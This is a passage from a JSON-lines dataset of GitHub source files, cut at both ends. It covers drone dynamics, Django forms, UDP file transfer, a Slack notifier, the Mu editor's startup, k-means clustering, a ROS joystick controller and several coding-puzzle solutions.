tau_x = b * l * (omega_3**2 - omega_1**2)\n tau_y = b * l * (omega_4**2 - omega_2**2)\n tau_z = d * (omega_2**2 + omega_4**2 - omega_1**2 - omega_3**2)\n\n return f_t, tau_x, tau_y, tau_z\n\n def _get_thrust_drag_factors(self):\n # thrust (b) and drag (d) factors\n _, r_b, _, _, _, _, _, _ = self._get_system_parameters()\n area = self.pi * r_b**2\n b = 0.5 * self.rho_air * self.c_b * area * r_b**2\n d = 0.5 * self.rho_air * self.c_d * area * r_b**2\n\n return b, d\n\n def _get_system_parameters(self):\n phi_0, phi_1, phi_2, phi_3, omega_1, omega_2, omega_3, omega_4 = self.parameters.split(1, dim=-1)\n l, r_b, t, w = phi_0 + phi_1, phi_1, phi_2, phi_3\n\n return l, r_b, t, w, omega_1, omega_2, omega_3, omega_4\n\n @staticmethod\n def circular_bound(val, bound):\n # sign depends on how many circle were performed\n odd_overflow = (torch.floor(val / bound) - (val < 0.).float()).fmod(2)\n\n return val.fmod(bound) - odd_overflow * bound\n\n @abstractmethod\n def disturbance(self, states, actions):\n \"\"\" disturbance distribution P_xi(.|s_t, a_t)\n returns a torch.distribution object \"\"\"\n raise NotImplementedError\n\n def disturbance_to_force(self, states, actions, dist):\n \"\"\" transforms a disturbance into a force and a torque applied on the drone \"\"\"\n return dist\n\n @abstractmethod\n def render(self, states, actions, dist, rewards, num_trj):\n raise NotImplementedError\n\n @abstractmethod\n def control_perf(self, states, actions, disturbances, rewards):\n raise NotImplementedError\n\n def parameters_dict(self):\n \"\"\" returns a dictionary mapping the parameters\" name to their values \"\"\"\n return {name: self.get_parameters()[:, i].mean().item() for i, name in enumerate(self.get_feasible_set())}\n\n def get_feasible_set(self):\n \"\"\" returns the set of feasible values \"\"\"\n return {\"arm\": self.feasible_set[\"arm\"],\n \"radius\": self.feasible_set[\"radius\"],\n \"thickness\": self.feasible_set[\"thickness\"],\n \"width\": self.feasible_set[\"width\"],\n **{f\"speed-{i}\": self.feasible_set[\"speed\"] for i in range(self.parameter_space.shape[0] - 4)}}\n\n def get_parameters(self):\n \"\"\" returns the parameter vector \"\"\"\n return self.parameters\n\n def to_gym(self):\n \"\"\" builds a gym environment \"\"\"\n raise NotImplementedError\n","repo_name":"adrienBolland/Jointly-Learning-Environments-and-Control-Policies-with-Projected-Stochastic-Gradient-Ascent","sub_path":"system/Drone/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37384103146","text":"from django import forms\nfrom django.forms import Select, ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import Kills\nimport pandas as pd\n\nclass Registration(UserCreationForm):\n\n email = forms.EmailField(label='Your email')\n\n def __init__(self, *args, **kwargs):\n super(UserCreationForm, self).__init__(*args, **kwargs)\n\n for fieldname in ['username', 'password1', 'password2']:\n self.fields[fieldname].help_text = None\n\n class Meta:\n model = User\n fields = (\"username\", \"email\") # No password field needed\n\n def save_user(self, commit=True):\n user = super(Registration, self).save(commit=False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save()\n return user\n\nclass MvpKill(forms.Form):\n\n model = Kills\n fields = (\"name\", \"quantity\")\n CHOICES = []\n listmvp = pd.read_csv('RagnarokDatabase/static/Lista MVP.csv')\n \n for row in listmvp.itertuples():\n CHOICES.append(row)\n \n name = forms.ChoiceField(choices=CHOICES)\n quantity = forms.IntegerField(required=False, initial=1)\n owner=\"\"\n\nclass LoginForm(forms.Form):\n email = forms.EmailField(label='Your email')\n\n class Meta:\n model = User\n fields = (\"username\", \"email\")\n","repo_name":"RomeroRodriguezD/RagnarokMVPKillsDatabase","sub_path":"RagnarokDatabase/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20821114275","text":"import os\nimport socket\nimport sys\nimport time\n\ndef receive(client_socket, cmd, fpath, buffer_size=1024):\n receiver_ip = socket.gethostbyname(socket.getfqdn())\n print(\"ready for receive... \")\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n sock.bind((receiver_ip, 0))\n receiver_port = sock.getsockname()[1]\n print(receiver_port)\n cmd = cmd + \" \" +receiver_ip+\" \"+str(receiver_port)\n receiver_port = int(receiver_port)\n client_socket.send(cmd.encode('utf-8'))\n try:\n filesize, addr = sock.recvfrom(buffer_size)\n filesize = filesize.decode()\n print(\"File Size: \", filesize)\n size = 0\n remain= int(filesize)\n start_time = time.time()\n with open(fpath, \"w\") as f:\n while True:\n if remain >= buffer_size:\n fileInfo , addr = sock.recvfrom(buffer_size)\n fileInfo = fileInfo.decode()\n f.write(fileInfo)\n remain -=buffer_size\n size += buffer_size\n print(size ,\"/\", filesize ,\" (currentsize/totalsize) ,\", round((100.00 *size/int(filesize)),2) ,\"%\")\n else:\n fileInfo , addr = sock.recvfrom(remain)\n fileInfo = fileInfo.decode()\n f.write(fileInfo)\n size+=remain\n print(size ,\"/\", filesize ,\" (currentsize/totalsize) ,\", round((100.00 *size/int(filesize)),2) ,\"%\")\n print(\"Completed ....\")\n break\n end_time = time.time()\n print(\"Time elapsed : \", end_time - start_time)\n except socket.error as e:\n print(e)\n sys.exit()\n\ndef send(receiver_ip, receiver_port, fpath, buffer_size=1024):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP\n sock.settimeout(10)\n size = 0\n filesize = os.path.getsize(fpath) \n remain = filesize\n receiver_port = int(receiver_port)\n print(\"FileSize : \", filesize)\n sock.sendto(str(filesize).encode(),(receiver_ip, receiver_port))\n time.sleep(1/10.0)\n start_time = time.time()\n try:\n with open(fpath, 'rb') as f:\n while True:\n if remain >= buffer_size:\n remain -=buffer_size\n read_data = f.read(buffer_size)\n size += buffer_size\n print(size , \"/\",filesize , \"(Currentsize/Totalsize) , \", round((100.00 * size/int(filesize)),2), \"%\")\n sock.sendto(read_data,(receiver_ip, receiver_port))\n time.sleep(1/10.0)\n else:\n size+=remain\n read_data = f.read(remain)\n print(size , \"/\",filesize , \"(Currentsize/Totalsize) , \", round((100.00 * size/int(filesize)),2), \"%\")\n sock.sendto(read_data, (receiver_ip, receiver_port))\n time.sleep(1/10.0)\n print(\"Completed ...\")\n break\n\n end_time = time.time()\n print(\"Time elapsed : \", end_time - start_time)\n except socket.error as e:\n print(e)\n sys.exit()\n","repo_name":"sh92/mfdfs","sub_path":"client/uftp/uftp.py","file_name":"uftp.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21373376477","text":"import slack\nimport sys\nimport threading\nfrom functools import wraps\n\ndefault_channel = 'sketch-transformer'\n\n\nclass Notifyier(object):\n\n def __init__(self, config_file=None):\n self.dummy = config_file is None or config_file == ''\n if not self.dummy:\n with open(config_file) as f:\n self.token = f.readline().strip()\n self.channel = f.readline().strip()\n self.slack_threads = {}\n\n def send_if_not_dummy(send):\n @wraps(send)\n def wrapper(inst, *args, **kwargs):\n if inst.dummy:\n print(\"[Notification] Not sent because there is no token\")\n return\n else:\n send(inst, *args, **kwargs)\n return wrapper\n\n def _send_initial_message(self, sc, experiment_id):\n \"\"\"Starts the thread on slack by sending the initial message with the\n command line arguments and experiment ID\n \"\"\"\n message = \"*[{}]*\\n`python {}`\".format(experiment_id, ' '.join(sys.argv))\n response = sc.chat_postMessage(\n channel=self.channel,\n text=message,\n as_user=True\n )\n self.slack_threads[experiment_id] = response[\"ts\"]\n\n @send_if_not_dummy\n def notify_with_message(self, message, experiment_id, send_to_channel=False):\n \"\"\"Sends a message to the thread associated with this experiment_id\n \"\"\"\n try:\n sc = slack.WebClient(self.token)\n if self.slack_threads.get(experiment_id) is None:\n self._send_initial_message(sc, experiment_id)\n sc.chat_postMessage(\n channel=self.channel,\n text=message,\n thread_ts=self.slack_threads[experiment_id],\n reply_broadcast=send_to_channel,\n as_user=True\n )\n except Exception as e:\n print(repr(e))\n\n def _notify_with_image(self, imagepath, experiment_id, message):\n try:\n sc = slack.WebClient(self.token)\n sc.files_upload(title=message,\n channels=self.channel,\n thread_ts=self.slack_threads[experiment_id],\n file=imagepath)\n except Exception as e:\n print(repr(e))\n\n @send_if_not_dummy\n def notify_with_image(self, imagepath, experiment_id, message=None):\n \"\"\"Sends an image to the thread associated with this experiment_id\n \"\"\"\n try:\n if message is None:\n message = imagepath\n if self.slack_threads.get(experiment_id) is None:\n sc = slack.WebClient(self.token)\n self._send_initial_message(sc, experiment_id)\n os_thread = threading.Thread(target=self._notify_with_image,\n args=(imagepath, experiment_id, message))\n os_thread.start()\n except Exception as e:\n print(repr(e))\n","repo_name":"leosampaio/sketchformer","sub_path":"core/notifyier.py","file_name":"notifyier.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"9489118053","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\nimport platform\nimport sys\n\nfrom PyQt5.QtCore import QTimer, Qt, QCoreApplication\nfrom PyQt5.QtWidgets import QApplication, QSplashScreen\n\nfrom . import i18n\nfrom .virtual_environment import venv\nfrom . import __version__\nfrom .logic import Editor, LOG_FILE, LOG_DIR, ENCODING\nfrom .interface import Window\nfrom .resources import load_pixmap, load_icon\nfrom .modes import (\n PythonMode,\n CircuitPythonMode,\n MicrobitMode,\n DebugMode,\n PyGameZeroMode,\n ESPMode,\n WebMode,\n PyboardMode,\n)\nfrom .interface.themes import NIGHT_STYLE, DAY_STYLE, CONTRAST_STYLE\nfrom . import settings\n\n\ndef excepthook(*exc_args):\n \"\"\"\n Log exception and exit cleanly.\n \"\"\"\n logging.error(\"Unrecoverable error\", exc_info=(exc_args))\n sys.__excepthook__(*exc_args)\n sys.exit(1)\n\n\ndef setup_logging():\n \"\"\"\n Configure logging.\n \"\"\"\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n\n # set logging format\n log_fmt = (\n \"%(asctime)s - %(name)s:%(lineno)d(%(funcName)s) \"\n \"%(levelname)s: %(message)s\"\n )\n formatter = logging.Formatter(log_fmt)\n\n # define log handlers such as for rotating log files\n handler = TimedRotatingFileHandler(\n LOG_FILE, when=\"midnight\", backupCount=5, delay=0, encoding=ENCODING\n )\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n\n # set up primary log\n log = logging.getLogger()\n log.setLevel(logging.DEBUG)\n log.addHandler(handler)\n sys.excepthook = excepthook\n\n\ndef setup_modes(editor, view):\n \"\"\"\n Create a simple dictionary to hold instances of the available modes.\n\n *PREMATURE OPTIMIZATION ALERT* This may become more complex in future so\n splitting things out here to contain the mess. ;-)\n \"\"\"\n return {\n \"python\": PythonMode(editor, view),\n \"circuitpython\": CircuitPythonMode(editor, view),\n \"microbit\": MicrobitMode(editor, view),\n \"esp\": ESPMode(editor, view),\n \"web\": WebMode(editor, view),\n \"pyboard\": PyboardMode(editor, view),\n \"debugger\": DebugMode(editor, view),\n \"pygamezero\": PyGameZeroMode(editor, view),\n }\n\n\ndef run():\n \"\"\"\n Creates all the top-level assets for the application, sets things up and\n then runs the application. Specific tasks include:\n\n - set up logging\n - create an application object\n - create an editor window and status bar\n - display a splash screen while starting\n - close the splash screen after startup timer ends\n \"\"\"\n setup_logging()\n logging.info(\"\\n\\n-----------------\\n\\nStarting Mu {}\".format(__version__))\n logging.info(platform.uname())\n logging.info(\"Python path: {}\".format(sys.path))\n logging.info(\"Language code: {}\".format(i18n.language_code))\n\n #\n # Load settings from known locations and register them for\n # autosave\n #\n settings.init()\n\n # Images (such as toolbar icons) aren't scaled nicely on retina/4k displays\n # unless this flag is set\n os.environ[\"QT_AUTO_SCREEN_SCALE_FACTOR\"] = \"1\"\n if hasattr(Qt, \"AA_EnableHighDpiScaling\"):\n QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)\n QApplication.setAttribute(Qt.AA_UseHighDpiPixmaps)\n\n # An issue in PyQt5 v5.13.2 to v5.15.1 makes PyQt5 application\n # hang on Mac OS 11 (Big Sur)\n # Setting this environment variable fixes the problem.\n # See issue #1147 for more information\n os.environ[\"QT_MAC_WANTS_LAYER\"] = \"1\"\n\n # The app object is the application running on your computer.\n app = QApplication(sys.argv)\n # By default PyQt uses the script name (run.py)\n app.setApplicationName(\"mu\")\n # Set hint as to the .desktop files name\n app.setDesktopFileName(\"mu.codewith.editor\")\n app.setApplicationVersion(__version__)\n app.setAttribute(Qt.AA_DontShowIconsInMenus)\n\n #\n # FIXME -- look at the possiblity of tying ensure completion\n # into Splash screen finish below...\n #\n venv.ensure()\n\n # Create the \"window\" we'll be looking at.\n editor_window = Window()\n\n @editor_window.load_theme.connect\n def load_theme(theme):\n if theme == \"contrast\":\n app.setStyleSheet(CONTRAST_STYLE)\n elif theme == \"night\":\n app.setStyleSheet(NIGHT_STYLE)\n else:\n app.setStyleSheet(DAY_STYLE)\n\n # Display a friendly \"splash\" icon.\n splash = QSplashScreen(load_pixmap(\"splash-screen\"))\n splash.show()\n\n def raise_and_process_events():\n # Make sure the splash screen stays on top while\n # the mode selection dialog might open\n splash.raise_()\n\n # Make sure splash screen reacts to mouse clicks, even when\n # the event loop is not yet started\n QCoreApplication.processEvents()\n\n raise_splash = QTimer()\n raise_splash.timeout.connect(raise_and_process_events)\n raise_splash.start(10)\n\n # Hide the splash icon.\n def remove_splash():\n splash.finish(editor_window)\n raise_splash.stop()\n\n splash_be_gone = QTimer()\n splash_be_gone.timeout.connect(remove_splash)\n splash_be_gone.setSingleShot(True)\n splash_be_gone.start(2000)\n\n # Make sure all windows have the Mu icon as a fallback\n app.setWindowIcon(load_icon(editor_window.icon))\n # Create the \"editor\" that'll control the \"window\".\n editor = Editor(view=editor_window)\n editor.setup(setup_modes(editor, editor_window))\n # Setup the window.\n editor_window.closeEvent = editor.quit\n editor_window.setup(editor.debug_toggle_breakpoint, editor.theme)\n # Connect the various UI elements in the window to the editor.\n editor_window.connect_tab_rename(editor.rename_tab, \"Ctrl+Shift+S\")\n editor_window.connect_find_replace(editor.find_replace, \"Ctrl+F\")\n # Connect find again both forward and backward ('Shift+F3')\n find_again_handlers = (editor.find_again, editor.find_again_backward)\n editor_window.connect_find_again(find_again_handlers, \"F3\")\n editor_window.connect_toggle_comments(editor.toggle_comments, \"Ctrl+K\")\n editor.connect_to_status_bar(editor_window.status_bar)\n\n # Restore the previous session along with files passed by the os\n editor.restore_session(sys.argv[1:])\n\n # Stop the program after the application finishes executing.\n sys.exit(app.exec_())\n","repo_name":"magnetsrev/mu","sub_path":"mu/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"41427216272","text":"#!/usr/bin/env python3\n\nimport signal\nimport os\n\nimport i3ipc\n\nfocusHistory = {} # Indexed by workspace, contains pairs (prev, current)\ni3 = None\npidFile = os.path.join(os.environ[\"HOME\"], \".config\", \"i3\", \"alttab.pid\")\n\ndef focusWindowEvent(my_i3, e):\n global focusHistory\n global i3\n windowId = e.container.id\n if e.container.floating == \"user_on\" or e.container.floating == \"auto_on\":\n return\n try:\n workspace = i3.get_tree().find_by_id(windowId).workspace().name\n except AttributeError:\n return\n hist = focusHistory.get(workspace)\n if hist:\n histCurrent = hist[1]\n if windowId != histCurrent:\n focusHistory[workspace] = (histCurrent, windowId)\n else:\n focusHistory[workspace] = (None, windowId)\n\ndef focusWindow(signalnum, handler):\n global i3\n global focusHistory\n\n workspace = i3.get_tree().find_focused().workspace().name\n hist = focusHistory.get(workspace)\n if hist is not None:\n prev = hist[0]\n if prev is not None:\n target_window = i3.get_tree().find_by_id(prev)\n if target_window:\n target_window.command(\"focus\")\n\ndef main():\n global i3\n\n myPid = os.getpid()\n with open(pidFile, \"w\") as fp:\n print(myPid, file=fp)\n print(myPid)\n\n i3 = i3ipc.Connection()\n i3.on(\"window::focus\", focusWindowEvent)\n signal.signal(signal.SIGUSR1, focusWindow)\n\n i3.main()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davvil/dotfiles","sub_path":".config/i3/alttab.py","file_name":"alttab.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21926612639","text":"import os\nfrom dataclasses import dataclass\n\nimport yaml\n\n\n@dataclass\nclass Config:\n aws_access_key_id: str\n aws_secret_access_key: str\n region_name: str\n endpoint_url: str\n table_name: str\n\n\n# read conf/configuration.yaml\nwith open(\"conf/configuration.yaml\", \"r\") as stream:\n try:\n configuration_yaml = yaml.safe_load(stream)\n except yaml.YAMLError as ex:\n print(ex)\n raise ex\n\nconfig = Config(\n # secrets from environment variables\n aws_access_key_id=os.getenv('aws_access_key_id', 'FAKE_ACCESS_KEY'),\n aws_secret_access_key=os.getenv('aws_secret_access_key', 'FAKE_SECRET_KEY'),\n\n # read configuration parameters\n region_name=configuration_yaml['aws']['region_name'],\n endpoint_url=configuration_yaml['aws']['dynamodb']['endpoint_url'],\n table_name=configuration_yaml['highscore']['table_name'],\n)\n","repo_name":"torbenmoeller/highscore","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39757215766","text":"#!/bin/env python3\n\n\nN = 20201227\np, q = [int(x) for x in open('input.txt').readlines()]\n#print(p, q, N)\n\n\ndef brute_force(p, N):\n i = 1\n mul = 1\n while (mul * 7) % N != p:\n i += 1\n mul = (mul*7) % N\n return i\n\n\nx = brute_force(p, N)\ny = brute_force(q, N)\nres = 1\nfor i in range(y):\n res = (res*p) % N\nprint(res)\n\n","repo_name":"matusjokay/adventofcode","sub_path":"2020/25/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37218689841","text":"class Solution:\n def minSubsequence(self, nums: 'List[int]') -> 'List[int]':\n s = sum(nums)\n stk = []\n lst = sorted(nums)\n curr = 0\n while lst and curr <= s: #take out the largest number from the array, until the curr is > than the s\n stk.append(lst.pop())\n curr += stk[-1]\n s-=stk[-1]\n return stk","repo_name":"renjieliu/leetcode","sub_path":"1001_1499/1403.py","file_name":"1403.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"28002273717","text":"import uuid\n\nfrom invenio_db import db\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy_utils.models import Timestamp\nfrom sqlalchemy_utils.types import JSONType, UUIDType\n\n\nclass RecordMetadata(db.Model, Timestamp):\n \"\"\"Represent a record metadata inside the SQL database.\n\n Additionally it contains two columns ``created`` and ``updated``\n with automatically managed timestamps.\n \"\"\"\n\n # Enables SQLAlchemy-Continuum versioning\n __versioned__ = {}\n\n __tablename__ = 'records_metadata'\n\n id = db.Column(\n UUIDType,\n primary_key=True,\n default=uuid.uuid4,\n )\n \"\"\"Record identifier.\"\"\"\n\n json = db.Column(\n JSONType().with_variant(\n postgresql.JSON(none_as_null=True),\n 'postgresql',\n ),\n default=lambda: dict(),\n nullable=True\n )\n \"\"\"Store metadata in JSON format.\n\n When you create new ``Record`` the ``json`` field value should\n never be ``NULL``. Default value is an empty dict. ``NULL``\n value means that the record metadata has been deleted.\n \"\"\"\n\n version_id = db.Column(db.Integer, nullable=False)\n \"\"\"It is used by SQLAlchemy for optimistic concurrency control.\"\"\"\n\n __mapper_args__ = {\n 'version_id_col': version_id\n }\n\n\n__all__ = (\n 'RecordMetadata',\n)\n","repo_name":"N03/invenio","sub_path":".virtualenvs/invenio/lib/python2.7/site-packages/invenio_records/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4773736269","text":"import matplotlib.pyplot as plt\nfrom config import *\nimport numpy as np\nimport pandas as pd\n\n# 画图设置\nplt.rcParams[\"font.sans-serif\"] = [\"SimHei\"] # 设置字体\nplt.rcParams[\"axes.unicode_minus\"] = False # 该语句解决图像中的“-”负号的乱码问题\n\n\n\n\ndef data_preprocess(file_path: str) -> tuple[pd.DataFrame, pd.DataFrame, int]:\n \"\"\"\n 数据预处理\n :param data_path: 数据路径\n :return: 数据集\n \"\"\"\n # 类 1: 59\n # 类 2: 71\n # 类 3: 48\n # 读取数据 (13个特征)\n data = pd.read_csv(os.path.join(data_dir, file_path), header=None)\n # 数据归一化\n # data = (data - data.min()) / (data.max() - data.min())\n print(data.head())\n # 去掉第一行的类别\n return data[0], data.drop([0], axis=1), len(data)\n # return data[0], data, len(data)\n\ndef cal_sse(mat: np.mat, length: int, k: int = 3) -> float:\n \"\"\"\n 计算sse\n :param mat: 数据集\n :param length: 数据集长度\n :param k: 聚类中心个数\n :return: sse\n \"\"\"\n sse_num = np.zeros(3)\n sse = 0\n for i in range(length):\n type = int(mat[i, 1]) - 1\n sse_num[type] += mat[i, 0]\n sse += sum(sse_num)\n print(\"All sse: \", sse)\n return sse\n\n\ndef gen_rand_ceter(data: pd.DataFrame, length: int, k: int = 3) -> np.ndarray:\n \"\"\"\n 生成随机聚类中心\n :param data: 数据集\n :param length: 数据集长度\n :return: 聚类中心\n \"\"\"\n data_list = data.to_numpy()\n rand_ceter = np.zeros((k, data.shape[1]))\n # 随机生成聚类中心\n # for j in range(data.shape[1]):\n # rand_ceter[:, j] = np.random.rand(k)\n # 缩小范围生成聚类中心\n for j in range(data.shape[1]):\n # 获取每一列的最小值和最大值\n ran = float(max(data_list[:, j]) - min(data_list[:, j]))\n # 设置随机种子\n rand_ceter[:, j] = min(data_list[:, j]) + ran * np.random.rand(k)\n return rand_ceter\n\n\ndef gen_acc(mat: np.mat, length: int, k: int = 3) -> float:\n \"\"\"\n 计算准确率\n :param mat: 数据集\n :param length: 数据集长度\n :param k: 聚类中心个数\n :return: 准确率\n \"\"\"\n acc = 0\n for i in range(length):\n if mat[i, 1] == mat[i, 2]:\n acc += 1\n print(\"acc: \", acc / length)\n return acc / length\n\n\nif __name__ == \"__main__\":\n label,data, length = data_preprocess(\"归一化数据.csv\")\n # 初始化聚类中心个数\n k = cluster_num\n # 初始化最大迭代次数\n iter_num = max_iter\n # 矩阵,第一列存储欧式距离,第二列存储类别,第三列存储真实类别\n mat = np.mat(np.zeros((length, 3)))\n # 初始化真实类别\n for i in range(length):\n if i < 59:\n mat[i, 2] = 1\n elif i < 130:\n mat[i, 2] = 2\n else:\n mat[i, 2] = 3\n # print(label)\n #print(mat)\n # 初始化聚类中心\n cluster_centers = gen_rand_ceter(data, length, k)\n #print(cluster_centers)\n sse_list = []\n # 迭代\n for i in range(iter_num):\n print(\"iter: \", i)\n # 计算欧式距离\n for j in range(length):\n min_dist = np.inf\n min_index = -1\n # 完成分类\n for l in range(k):\n # 计算欧式距离\n dist = np.sqrt(np.sum(np.power(cluster_centers[l, :] - data.iloc[j, :], 2)))\n if dist < min_dist:\n min_dist = dist\n min_index = l + 1\n # 标注类别\n mat[j, :] = min_dist, min_index, mat[j, 2]\n #print(mat)\n # 更新聚类中心\n new_cluster_centers = np.zeros((k, data.shape[1]))\n for j in range(k):\n # 计算新的聚类中心\n new_cluster_centers[j, :] = np.mean(data.iloc[np.nonzero(mat[:, 1].A == j + 1)[0]], axis=0)\n # cluster_centers = new_cluster_centers\n print(\"cluster_centers: \", cluster_centers)\n sse = cal_sse(mat, length, k)\n sse_list.append(sse)\n if np.all(cluster_centers == new_cluster_centers):\n break\n else:\n cluster_centers = new_cluster_centers\n # 计算sse\n sse = cal_sse(mat, length, k)\n # 计算准确率\n acc = gen_acc(mat, length, k)\n\n # 画图\n X = 6 # 总酚\n Y = 7 # 黄酮\n\n plt.xlabel('特征7')\n plt.ylabel('特征8')\n plt.title('SSE=%.3f Acc=%.3f' % (sse, acc))\n plt.axis([0, 1, 0, 1])\n for i in range(length):\n if int(mat[i, 1]) == 1:\n plt.scatter(data.iloc[i, X], data.iloc[i, Y], c='r', marker='o')\n elif int(mat[i, 1]) == 2:\n plt.scatter(data.iloc[i, X], data.iloc[i, Y], c='g', marker='o')\n else:\n plt.scatter(data.iloc[i, X], data.iloc[i, Y], c='b', marker='o')\n plt.savefig(os.path.join(img_dir, \"res.png\"))\n\n # 画出sse变化图\n plt.figure()\n plt.plot(range(len(sse_list)), sse_list)\n plt.xlabel('iter')\n plt.ylabel('sse')\n plt.title('SSE')\n plt.savefig(os.path.join(img_dir, \"sse.png\"))\n\n\n","repo_name":"shimmer147/BigDataAnylisis","sub_path":"Lab3Kmeans/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32877513871","text":"from typing import *\n\n\nclass Solution:\n def threeSumSmaller(self, nums: List[int], target: int) -> int:\n nums.sort()\n count = 0\n for i in range(len(nums)):\n count += self.search_pair(nums, target - nums[i], i)\n return count\n\n def search_pair(self, nums, target_sum, i):\n count = 0\n l, r = i + 1, len(nums) - 1\n while l < r:\n if nums[l] + nums[r] < target_sum:\n count += r - l\n l += 1\n else:\n r -= 1\n return count\n","repo_name":"yeetcode0/yeetcode-ra","sub_path":"leetcode/00259-ThreeSumSmaller/cheok.py","file_name":"cheok.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36225851193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport rospy, time\nfrom sensor_msgs.msg import Joy\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String\n\nclass JoyLed():\n def __init__(self):\n self._joy_sub = rospy.Subscriber(\"/joy\", Joy, self.joy_callback, queue_size=1)\n self._vel_pub = rospy.Publisher(\"/cmd_vel\", Twist, queue_size=1)\n self._led_pub = rospy.Publisher(\"/cmd_led\", String, queue_size=1)\n self.set_led(\"0\")\n self.set_vel(0.0, 0.0)\n\n def set_vel(self, vx, vth):\n twist = Twist()\n twist.linear.x = vx\n twist.angular.z = vth\n\n self._vel_pub.publish(twist)\n del twist\n\n def set_led(self, msg):\n message = msg \n self._led_pub.publish(message)\n\n del message\n\n def joy_callback(self, joy_msg):\n if joy_msg.buttons[2] == 1:\n msg = str(1)\n self.set_led(msg)\n \n elif joy_msg.buttons[0] == 1:\n vx = joy_msg.axes[7] * 0.3\n vth = joy_msg.axes[6] * 3.14 / 4\n self.set_vel(vx, vth)\n\n else :\n msg = str(0)\n vx = joy_msg.axes[7] * 0.0\n vth = joy_msg.axes[6] * 0.0\n\n self.set_led(msg)\n self.set_vel(vx, vth)\n \n\nif __name__ == \"__main__\":\n rospy.init_node(\"ps4_controller\")\n led_on_off = JoyLed()\n rospy.spin()","repo_name":"study928/agv_common","sub_path":"agv_control/script/ps4_controller.py","file_name":"ps4_controller.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8597361357","text":"from __future__ import annotations\n\nimport logging\nfrom collections import defaultdict\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom typing import DefaultDict, Literal\n\nfrom wazo_call_logd.database.models import CallLog, CallLogParticipant\nfrom wazo_call_logd.exceptions import InvalidCallLogException\nfrom wazo_call_logd.extension_filter import DEFAULT_HIDDEN_EXTENSIONS, ExtensionFilter\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass BridgeInfo:\n id: str\n technology: str\n channels: set[str] = field(default_factory=set)\n\n\nclass RawCallLog:\n def __init__(self):\n self.date: datetime | None = None\n self.date_end: datetime | None = None\n self.source_name: str | None = None\n self.source_exten: str | None = None\n self.source_internal_exten: str | None = None\n self.source_internal_context: str | None = None\n self.source_internal_name: str | None = None\n self.requested_name: str | None = None\n self.requested_exten: str | None = None\n self.requested_context: str | None = None\n self.requested_internal_exten: str | None = None\n self.requested_internal_context: str | None = None\n self.destination_name: str | None = None\n self.destination_exten: str | None = None\n self.destination_internal_exten: str | None = None\n self.destination_internal_context: str | None = None\n self.destination_line_identity: str | None = None\n self.user_field: str | None = None\n self.date_answer: datetime | None = None\n self.source_line_identity: str | None = None\n self.direction: Literal['source', 'destination', 'internal'] = 'internal'\n self.raw_participants: DefaultDict[str, dict] = defaultdict(dict)\n self.participants_info: list[dict] = []\n self.participants: list[CallLogParticipant] = []\n self.recordings: list = []\n self.cel_ids: list[int] = []\n self.interpret_callee_bridge_enter: bool = True\n self.interpret_caller_xivo_user_fwd: bool = True\n self._tenant_uuid: str = None # type: ignore[assignment]\n self.pending_wait_for_mobile_peers: set[str] = set()\n self.caller_id_by_channels: dict[str, str] = {}\n self.extension_filter: ExtensionFilter = ExtensionFilter(\n DEFAULT_HIDDEN_EXTENSIONS\n )\n self.bridges: dict[str, BridgeInfo] | None = {}\n self.destination_details: list = []\n\n @property\n def tenant_uuid(self) -> str:\n return self._tenant_uuid\n\n def set_tenant_uuid(self, tenant_uuid):\n if self._tenant_uuid is None:\n self._tenant_uuid = str(tenant_uuid)\n elif self._tenant_uuid != tenant_uuid:\n logger.error(\n \"We got a cel with an expected tenant_uuid: \" \"%s instead of %s\",\n tenant_uuid,\n self._tenant_uuid,\n )\n\n def to_call_log(self) -> CallLog:\n if not self.date:\n raise InvalidCallLogException('date not found')\n if not (self.source_name or self.source_exten):\n raise 